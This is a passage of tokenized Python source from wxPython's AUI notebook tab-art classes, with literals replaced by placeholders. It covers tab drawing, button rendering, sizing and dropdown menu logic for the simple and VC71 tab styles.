focusRectText . Union ( focusRectBitmap ) <EOL> focusRect . 
Inflate ( <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> dc . SetBrush ( wx . TRANSPARENT_BRUSH ) <EOL> dc . SetPen ( self . _focusPen ) <EOL> dc . DrawRoundedRectangleRect ( focusRect , <NUM_LIT:2> ) <EOL> def GetBestTabCtrlSize ( self , wnd , pages , required_bmp_size ) : <EOL> """<STR_LIT>""" <EOL> dc = wx . ClientDC ( wnd ) <EOL> dc . SetFont ( self . _measuring_font ) <EOL> measure_bmp = wx . NullBitmap <EOL> if required_bmp_size . IsFullySpecified ( ) : <EOL> measure_bmp = wx . EmptyBitmap ( required_bmp_size . x , <EOL> required_bmp_size . y ) <EOL> max_y = <NUM_LIT:0> <EOL> for page in pages : <EOL> if measure_bmp . IsOk ( ) : <EOL> bmp = measure_bmp <EOL> else : <EOL> bmp = page . bitmap <EOL> s , x_ext = self . GetTabSize ( dc , wnd , page . caption , bmp , True , AUI_BUTTON_STATE_HIDDEN , None ) <EOL> max_y = max ( max_y , s [ <NUM_LIT:1> ] ) <EOL> if page . control : <EOL> controlW , controlH = page . control . GetSize ( ) <EOL> max_y = max ( max_y , controlH + <NUM_LIT:4> ) <EOL> return max_y + <NUM_LIT:2> <EOL> def SetNormalFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _normal_font = font <EOL> def SetSelectedFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _selected_font = font <EOL> def SetMeasuringFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _measuring_font = font <EOL> def GetNormalFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _normal_font <EOL> def GetSelectedFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _selected_font <EOL> def GetMeasuringFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _measuring_font <EOL> def ShowDropDown ( self , wnd , pages , active_idx ) : <EOL> """<STR_LIT>""" <EOL> useImages = self . GetAGWFlags ( ) & AUI_NB_USE_IMAGES_DROPDOWN <EOL> menuPopup = wx . Menu ( ) <EOL> longest = <NUM_LIT:0> <EOL> for i , page in enumerate ( pages ) : <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT:U+0020>" <EOL> width = wnd . 
GetTextExtent ( caption ) [ <NUM_LIT:0> ] <EOL> if width > longest : <EOL> longest = width <EOL> if useImages : <EOL> menuItem = wx . MenuItem ( menuPopup , <NUM_LIT:1000> + i , caption ) <EOL> if page . bitmap : <EOL> menuItem . SetBitmap ( page . bitmap ) <EOL> menuPopup . AppendItem ( menuItem ) <EOL> else : <EOL> menuPopup . AppendCheckItem ( <NUM_LIT:1000> + i , caption ) <EOL> menuPopup . Enable ( <NUM_LIT:1000> + i , page . enabled ) <EOL> if active_idx != - <NUM_LIT:1> and not useImages : <EOL> menuPopup . Check ( <NUM_LIT:1000> + active_idx , True ) <EOL> cli_rect = wnd . GetClientRect ( ) <EOL> if wx . Platform in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> longest += <NUM_LIT:32> <EOL> longest += <NUM_LIT:20> <EOL> if self . GetAGWFlags ( ) & AUI_NB_CLOSE_BUTTON : <EOL> longest += <NUM_LIT:16> <EOL> pt = wx . Point ( cli_rect . x + cli_rect . GetWidth ( ) - longest , <EOL> cli_rect . y + cli_rect . height ) <EOL> cc = AuiCommandCapture ( ) <EOL> wnd . PushEventHandler ( cc ) <EOL> wnd . PopupMenu ( menuPopup , pt ) <EOL> command = cc . GetCommandId ( ) <EOL> wnd . PopEventHandler ( True ) <EOL> if command >= <NUM_LIT:1000> : <EOL> return command - <NUM_LIT:1000> <EOL> return - <NUM_LIT:1> <EOL> class AuiSimpleTabArt ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _normal_font = wx . SystemSettings . GetFont ( wx . SYS_DEFAULT_GUI_FONT ) <EOL> self . _selected_font = wx . SystemSettings . GetFont ( wx . SYS_DEFAULT_GUI_FONT ) <EOL> self . _selected_font . SetWeight ( wx . BOLD ) <EOL> self . _measuring_font = self . _selected_font <EOL> self . _agwFlags = <NUM_LIT:0> <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> base_colour = wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DFACE ) <EOL> background_colour = base_colour <EOL> normaltab_colour = base_colour <EOL> selectedtab_colour = wx . WHITE <EOL> self . _bkbrush = wx . Brush ( background_colour ) <EOL> self . _normal_bkbrush = wx . 
Brush ( normaltab_colour ) <EOL> self . _normal_bkpen = wx . Pen ( normaltab_colour ) <EOL> self . _selected_bkbrush = wx . Brush ( selectedtab_colour ) <EOL> self . _selected_bkpen = wx . Pen ( selectedtab_colour ) <EOL> self . _active_close_bmp = BitmapFromBits ( nb_close_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_close_bmp = BitmapFromBits ( nb_close_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_left_bmp = BitmapFromBits ( nb_left_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_left_bmp = BitmapFromBits ( nb_left_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_right_bmp = BitmapFromBits ( nb_right_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_right_bmp = BitmapFromBits ( nb_right_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_windowlist_bmp = BitmapFromBits ( nb_list_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_windowlist_bmp = BitmapFromBits ( nb_list_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def SetAGWFlags ( self , agwFlags ) : <EOL> """<STR_LIT>""" <EOL> self . _agwFlags = agwFlags <EOL> def GetAGWFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _agwFlags <EOL> def SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) : <EOL> """<STR_LIT>""" <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> minTabWidth , maxTabWidth = minMaxTabWidth <EOL> tot_width = tab_ctrl_size . x - self . 
GetIndentSize ( ) - <NUM_LIT:4> <EOL> if self . _agwFlags & AUI_NB_CLOSE_BUTTON : <EOL> tot_width -= self . _active_close_bmp . GetWidth ( ) <EOL> if self . _agwFlags & AUI_NB_WINDOWLIST_BUTTON : <EOL> tot_width -= self . _active_windowlist_bmp . GetWidth ( ) <EOL> if tab_count > <NUM_LIT:0> : <EOL> self . _fixed_tab_width = tot_width / tab_count <EOL> if self . _fixed_tab_width < <NUM_LIT:100> : <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> if self . _fixed_tab_width > tot_width / <NUM_LIT:2> : <EOL> self . _fixed_tab_width = tot_width / <NUM_LIT:2> <EOL> if self . _fixed_tab_width > <NUM_LIT> : <EOL> self . _fixed_tab_width = <NUM_LIT> <EOL> if minTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = max ( self . _fixed_tab_width , minTabWidth ) <EOL> if maxTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = min ( self . _fixed_tab_width , maxTabWidth ) <EOL> self . _tab_ctrl_height = tab_ctrl_size . y <EOL> def DrawBackground ( self , dc , wnd , rect ) : <EOL> """<STR_LIT>""" <EOL> dc . SetBrush ( self . _bkbrush ) <EOL> dc . SetPen ( wx . TRANSPARENT_PEN ) <EOL> dc . DrawRectangle ( - <NUM_LIT:1> , - <NUM_LIT:1> , rect . GetWidth ( ) + <NUM_LIT:2> , rect . GetHeight ( ) + <NUM_LIT:2> ) <EOL> dc . SetPen ( wx . GREY_PEN ) <EOL> dc . DrawLine ( <NUM_LIT:0> , rect . GetHeight ( ) - <NUM_LIT:1> , rect . GetWidth ( ) , rect . GetHeight ( ) - <NUM_LIT:1> ) <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> dc . SetFont ( self . _selected_font ) <EOL> selected_textx , selected_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> dc . SetFont ( self . _normal_font ) <EOL> normal_textx , normal_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> control = page . control <EOL> tab_size , x_extent = self . 
GetTabSize ( dc , wnd , page . caption , page . bitmap , <EOL> page . active , close_button_state , control ) <EOL> tab_height = tab_size [ <NUM_LIT:1> ] <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> caption = page . caption <EOL> if page . active : <EOL> dc . SetPen ( self . _selected_bkpen ) <EOL> dc . SetBrush ( self . _selected_bkbrush ) <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx = selected_textx <EOL> texty = selected_texty <EOL> else : <EOL> dc . SetPen ( self . _normal_bkpen ) <EOL> dc . SetBrush ( self . _normal_bkbrush ) <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx = normal_textx <EOL> texty = normal_texty <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> points = [ wx . Point ( ) for i in xrange ( <NUM_LIT:7> ) ] <EOL> points [ <NUM_LIT:0> ] . x = tab_x <EOL> points [ <NUM_LIT:0> ] . y = tab_y + tab_height - <NUM_LIT:1> <EOL> points [ <NUM_LIT:1> ] . x = tab_x + tab_height - <NUM_LIT:3> <EOL> points [ <NUM_LIT:1> ] . y = tab_y + <NUM_LIT:2> <EOL> points [ <NUM_LIT:2> ] . x = tab_x + tab_height + <NUM_LIT:3> <EOL> points [ <NUM_LIT:2> ] . y = tab_y <EOL> points [ <NUM_LIT:3> ] . x = tab_x + tab_width - <NUM_LIT:2> <EOL> points [ <NUM_LIT:3> ] . y = tab_y <EOL> points [ <NUM_LIT:4> ] . x = tab_x + tab_width <EOL> points [ <NUM_LIT:4> ] . y = tab_y + <NUM_LIT:2> <EOL> points [ <NUM_LIT:5> ] . x = tab_x + tab_width <EOL> points [ <NUM_LIT:5> ] . y = tab_y + tab_height - <NUM_LIT:1> <EOL> points [ <NUM_LIT:6> ] = points [ <NUM_LIT:0> ] <EOL> dc . SetClippingRect ( in_rect ) <EOL> dc . DrawPolygon ( points ) <EOL> dc . SetPen ( wx . GREY_PEN ) <EOL> dc . DrawLines ( points ) <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . 
_active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> if control : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:2> ) + close_button_width - ( textx / <NUM_LIT:2> ) - <NUM_LIT:2> <EOL> else : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:2> ) + ( ( tab_width + close_button_width ) / <NUM_LIT:2> ) - ( textx / <NUM_LIT:2> ) - <NUM_LIT:2> <EOL> else : <EOL> if control : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:2> ) + close_button_width - ( textx / <NUM_LIT:2> ) <EOL> else : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:2> ) + ( ( tab_width - close_button_width ) / <NUM_LIT:2> ) - ( textx / <NUM_LIT:2> ) <EOL> else : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:3> ) + ( tab_width / <NUM_LIT:2> ) - ( textx / <NUM_LIT:2> ) <EOL> if control : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:3> ) - ( textx / <NUM_LIT:2> ) + close_button_width + <NUM_LIT:2> <EOL> else : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:3> ) - ( textx / <NUM_LIT:2> ) <EOL> if text_offset < tab_x + tab_height : <EOL> text_offset = tab_x + tab_height <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) ) <EOL> else : <EOL> draw_text = ChopText ( dc , caption , <EOL> tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = ( tab_y + tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) + <NUM_LIT:1> <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . 
GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> if page . active and wx . Window . FindFocus ( ) == wnd and ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> focusRect = wx . Rect ( text_offset , ( ( tab_y + tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) + <NUM_LIT:1> ) , <EOL> selected_textx , selected_texty ) <EOL> focusRect . Inflate ( <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> if page . active : <EOL> bmp = self . _active_close_bmp <EOL> else : <EOL> bmp = self . _disabled_close_bmp <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + tab_height - <NUM_LIT:2> , <EOL> tab_y + ( tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + <NUM_LIT:1> , <EOL> close_button_width , tab_height - <NUM_LIT:1> ) <EOL> else : <EOL> rect = wx . Rect ( tab_x + tab_width - close_button_width - <NUM_LIT:1> , <EOL> tab_y + ( tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + <NUM_LIT:1> , <EOL> close_button_width , tab_height - <NUM_LIT:1> ) <EOL> self . DrawButtons ( dc , rect , bmp , wx . WHITE , close_button_state ) <EOL> out_button_rect = wx . Rect ( * rect ) <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> def DrawButtons ( self , dc , _rect , bmp , bkcolour , button_state ) : <EOL> """<STR_LIT>""" <EOL> rect = wx . Rect ( * _rect ) <EOL> if button_state == AUI_BUTTON_STATE_PRESSED : <EOL> rect . x += <NUM_LIT:1> <EOL> rect . y += <NUM_LIT:1> <EOL> if button_state in [ AUI_BUTTON_STATE_HOVER , AUI_BUTTON_STATE_PRESSED ] : <EOL> dc . SetBrush ( wx . Brush ( StepColour ( bkcolour , <NUM_LIT> ) ) ) <EOL> dc . SetPen ( wx . 
Pen ( StepColour ( bkcolour , <NUM_LIT> ) ) ) <EOL> dc . DrawRectangle ( rect . x , rect . y , <NUM_LIT:15> , <NUM_LIT:15> ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> def GetIndentSize ( self ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:0> <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control = None ) : <EOL> """<STR_LIT>""" <EOL> dc . SetFont ( self . _measuring_font ) <EOL> measured_textx , measured_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> tab_height = measured_texty + <NUM_LIT:4> <EOL> tab_width = measured_textx + tab_height + <NUM_LIT:5> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> tab_width += self . _active_close_bmp . GetWidth ( ) <EOL> if self . _agwFlags & AUI_NB_TAB_FIXED_WIDTH : <EOL> tab_width = self . _fixed_tab_width <EOL> if control is not None : <EOL> controlW , controlH = control . GetSize ( ) <EOL> tab_width += controlW + <NUM_LIT:4> <EOL> x_extent = tab_width - ( tab_height / <NUM_LIT:2> ) - <NUM_LIT:1> <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawButton ( self , dc , wnd , in_rect , button , orientation ) : <EOL> """<STR_LIT>""" <EOL> bitmap_id , button_state = button . id , button . cur_state <EOL> if bitmap_id == AUI_BUTTON_CLOSE : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_close_bmp <EOL> else : <EOL> bmp = self . _active_close_bmp <EOL> elif bitmap_id == AUI_BUTTON_LEFT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_left_bmp <EOL> else : <EOL> bmp = self . _active_left_bmp <EOL> elif bitmap_id == AUI_BUTTON_RIGHT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_right_bmp <EOL> else : <EOL> bmp = self . _active_right_bmp <EOL> elif bitmap_id == AUI_BUTTON_WINDOWLIST : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_windowlist_bmp <EOL> else : <EOL> bmp = self . 
_active_windowlist_bmp <EOL> else : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = button . dis_bitmap <EOL> else : <EOL> bmp = button . bitmap <EOL> if not bmp . IsOk ( ) : <EOL> return <EOL> rect = wx . Rect ( * in_rect ) <EOL> if orientation == wx . LEFT : <EOL> rect . SetX ( in_rect . x ) <EOL> rect . SetY ( ( ( in_rect . y + in_rect . height ) / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) ) <EOL> rect . SetWidth ( bmp . GetWidth ( ) ) <EOL> rect . SetHeight ( bmp . GetHeight ( ) ) <EOL> else : <EOL> rect = wx . Rect ( in_rect . x + in_rect . width - bmp . GetWidth ( ) , <EOL> ( ( in_rect . y + in_rect . height ) / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> bmp . GetWidth ( ) , bmp . GetHeight ( ) ) <EOL> self . DrawButtons ( dc , rect , bmp , wx . WHITE , button_state ) <EOL> out_rect = wx . Rect ( * rect ) <EOL> return out_rect <EOL> def ShowDropDown ( self , wnd , pages , active_idx ) : <EOL> """<STR_LIT>""" <EOL> menuPopup = wx . Menu ( ) <EOL> useImages = self . GetAGWFlags ( ) & AUI_NB_USE_IMAGES_DROPDOWN <EOL> for i , page in enumerate ( pages ) : <EOL> if useImages : <EOL> menuItem = wx . MenuItem ( menuPopup , <NUM_LIT:1000> + i , page . caption ) <EOL> if page . bitmap : <EOL> menuItem . SetBitmap ( page . bitmap ) <EOL> menuPopup . AppendItem ( menuItem ) <EOL> else : <EOL> menuPopup . AppendCheckItem ( <NUM_LIT:1000> + i , page . caption ) <EOL> menuPopup . Enable ( <NUM_LIT:1000> + i , page . enabled ) <EOL> if active_idx != - <NUM_LIT:1> and not useImages : <EOL> menuPopup . Check ( <NUM_LIT:1000> + active_idx , True ) <EOL> pt = wx . GetMousePosition ( ) <EOL> pt = wnd . ScreenToClient ( pt ) <EOL> if pt . x < <NUM_LIT:100> : <EOL> pt . x = <NUM_LIT:0> <EOL> else : <EOL> pt . x -= <NUM_LIT:100> <EOL> cli_rect = wnd . GetClientRect ( ) <EOL> pt . y = cli_rect . y + cli_rect . height <EOL> cc = AuiCommandCapture ( ) <EOL> wnd . PushEventHandler ( cc ) <EOL> wnd . 
PopupMenu ( menuPopup , pt ) <EOL> command = cc . GetCommandId ( ) <EOL> wnd . PopEventHandler ( True ) <EOL> if command >= <NUM_LIT:1000> : <EOL> return command - <NUM_LIT:1000> <EOL> return - <NUM_LIT:1> <EOL> def GetBestTabCtrlSize ( self , wnd , pages , required_bmp_size ) : <EOL> """<STR_LIT>""" <EOL> dc = wx . ClientDC ( wnd ) <EOL> dc . SetFont ( self . _measuring_font ) <EOL> s , x_extent = self . GetTabSize ( dc , wnd , "<STR_LIT>" , wx . NullBitmap , True , <EOL> AUI_BUTTON_STATE_HIDDEN , None ) <EOL> max_y = s [ <NUM_LIT:1> ] <EOL> for page in pages : <EOL> if page . control : <EOL> controlW , controlH = page . control . GetSize ( ) <EOL> max_y = max ( max_y , controlH + <NUM_LIT:4> ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( page . caption ) <EOL> max_y = max ( max_y , texty ) <EOL> return max_y + <NUM_LIT:3> <EOL> def SetNormalFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _normal_font = font <EOL> def SetSelectedFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _selected_font = font <EOL> def SetMeasuringFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _measuring_font = font <EOL> def GetNormalFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _normal_font <EOL> def GetSelectedFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _selected_font <EOL> def GetMeasuringFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _measuring_font <EOL> def SetCustomButton ( self , bitmap_id , button_state , bmp ) : <EOL> """<STR_LIT>""" <EOL> if bitmap_id == AUI_BUTTON_CLOSE : <EOL> if button_state == AUI_BUTTON_STATE_NORMAL : <EOL> self . _active_close_bmp = bmp <EOL> self . _hover_close_bmp = self . _active_close_bmp <EOL> self . _pressed_close_bmp = self . _active_close_bmp <EOL> self . _disabled_close_bmp = self . _active_close_bmp <EOL> elif button_state == AUI_BUTTON_STATE_HOVER : <EOL> self . _hover_close_bmp = bmp <EOL> elif button_state == AUI_BUTTON_STATE_PRESSED : <EOL> self . 
_pressed_close_bmp = bmp <EOL> else : <EOL> self . _disabled_close_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_LEFT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_left_bmp = bmp <EOL> else : <EOL> self . _active_left_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_RIGHT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_right_bmp = bmp <EOL> else : <EOL> self . _active_right_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_WINDOWLIST : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_windowlist_bmp = bmp <EOL> else : <EOL> self . _active_windowlist_bmp = bmp <EOL> class VC71TabArt ( AuiDefaultTabArt ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . __init__ ( self ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , page . active , <EOL> close_button_state , control ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:3> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> clip_width = tab_width <EOL> if tab_x + clip_width > in_rect . x + in_rect . width - <NUM_LIT:4> : <EOL> clip_width = ( in_rect . x + in_rect . width ) - tab_x - <NUM_LIT:4> <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:1> , tab_height - <NUM_LIT:3> ) <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> tab_y -= <NUM_LIT:1> <EOL> dc . 
SetPen ( ( page . active and [ wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DHIGHLIGHT ) ) ] or [ wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DSHADOW ) ) ] ) [ <NUM_LIT:0> ] ) <EOL> dc . SetBrush ( ( page . active and [ wx . Brush ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DFACE ) ) ] or [ wx . TRANSPARENT_BRUSH ] ) [ <NUM_LIT:0> ] ) <EOL> if page . active : <EOL> tabH = tab_height - <NUM_LIT:2> <EOL> dc . DrawRectangle ( tab_x , tab_y , tab_width , tabH ) <EOL> rightLineY1 = ( agwFlags & AUI_NB_BOTTOM and [ vertical_border_padding - <NUM_LIT:2> ] or [ vertical_border_padding - <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> rightLineY2 = tabH + <NUM_LIT:3> <EOL> dc . SetPen ( wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DSHADOW ) ) ) <EOL> dc . DrawLine ( tab_x + tab_width - <NUM_LIT:1> , rightLineY1 + <NUM_LIT:1> , tab_x + tab_width - <NUM_LIT:1> , rightLineY2 ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> dc . DrawLine ( tab_x + <NUM_LIT:1> , rightLineY2 - <NUM_LIT:3> , tab_x + tab_width - <NUM_LIT:1> , rightLineY2 - <NUM_LIT:3> ) <EOL> dc . SetPen ( wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DDKSHADOW ) ) ) <EOL> dc . DrawLine ( tab_x + tab_width , rightLineY1 , tab_x + tab_width , rightLineY2 ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> dc . DrawLine ( tab_x , rightLineY2 - <NUM_LIT:2> , tab_x + tab_width , rightLineY2 - <NUM_LIT:2> ) <EOL> else : <EOL> blackLineY1 = ( agwFlags & AUI_NB_BOTTOM and [ vertical_border_padding + <NUM_LIT:2> ] or [ vertical_border_padding + <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> blackLineY2 = tab_height - <NUM_LIT:5> <EOL> dc . DrawLine ( tab_x + tab_width , blackLineY1 , tab_x + tab_width , blackLineY2 ) <EOL> border_points = [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> border_points [ <NUM_LIT:0> ] = wx . Point ( tab_x , tab_y ) <EOL> border_points [ <NUM_LIT:1> ] = wx . 
Point ( tab_x , tab_y + tab_height - <NUM_LIT:6> ) <EOL> else : <EOL> border_points [ <NUM_LIT:0> ] = wx . Point ( tab_x , tab_y + tab_height - <NUM_LIT:4> ) <EOL> border_points [ <NUM_LIT:1> ] = wx . Point ( tab_x , tab_y + <NUM_LIT:2> ) <EOL> drawn_tab_yoff = border_points [ <NUM_LIT:1> ] . y <EOL> drawn_tab_height = border_points [ <NUM_LIT:0> ] . y - border_points [ <NUM_LIT:1> ] . y <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width - <NUM_LIT:5> <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> pagebitmap = page . bitmap <EOL> shift = <NUM_LIT:0> <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> shift = ( page . active and [ <NUM_LIT:1> ] or [ <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + <NUM_LIT:8> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width - <NUM_LIT:5> <EOL> dc . DrawBitmap ( pagebitmap , bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & 